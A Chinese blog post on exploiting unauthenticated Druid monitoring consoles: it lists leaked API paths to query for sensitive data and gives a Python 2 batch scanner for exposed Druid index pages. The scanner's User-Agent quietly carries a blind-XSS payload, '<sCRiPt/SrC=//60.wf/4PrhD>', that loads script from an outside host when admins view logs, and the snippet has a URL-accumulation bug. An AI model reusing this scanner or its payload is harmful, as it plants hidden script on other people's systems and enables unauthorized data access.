【实战】druid未授权访问后续利用

druid未授权访问漏洞挖到过很多,但是多数都是没有后续利用的,最近碰到了几个,简单记录下:

主要关注这几个点

 

 

URL监控泄露URI接口信息

 

这里遍历接口有个小技巧,我们首先选取一些可能涉及敏感信息的接口去做测试,当然这里有很多接口是需要带参数访问的,不带参数请求时有些服务端会返回参数,但是对于参数的内容,我们也需要一定的运气才能构造正确进行正常请求,所以我们一般直接去找那种可以获取所有字段信息的接口,一般不需要任何参数,就算需要参数也是简单的page,pagesize这些,本例就是这样:

 

一个接口直接获取涉及敏感数据所需的很多重要参数,可进一步找接口进行构造:

批量检测poc片段:

druid_path = r"""
    /druid/index.html
    /system/index.html
    /webpage/system/druid/index.html
    """
    paths = druid_path.strip().splitlines()

    for path in paths:
        url = url + path
        try:
            header = dict()
            header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
            requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
            r = requests.get(url, headers=header, timeout=8, verify=False, allow_redirects=False)
            if r.status_code == 200 and "Druid Stat Index" in r.content:
                print '[druid unauth]\t' + url
            else:
                continue
        except:
            print 'fail'

 

posted @ 2021-05-27 18:02  Carrypan  阅读(2013)  评论(0编辑  收藏  举报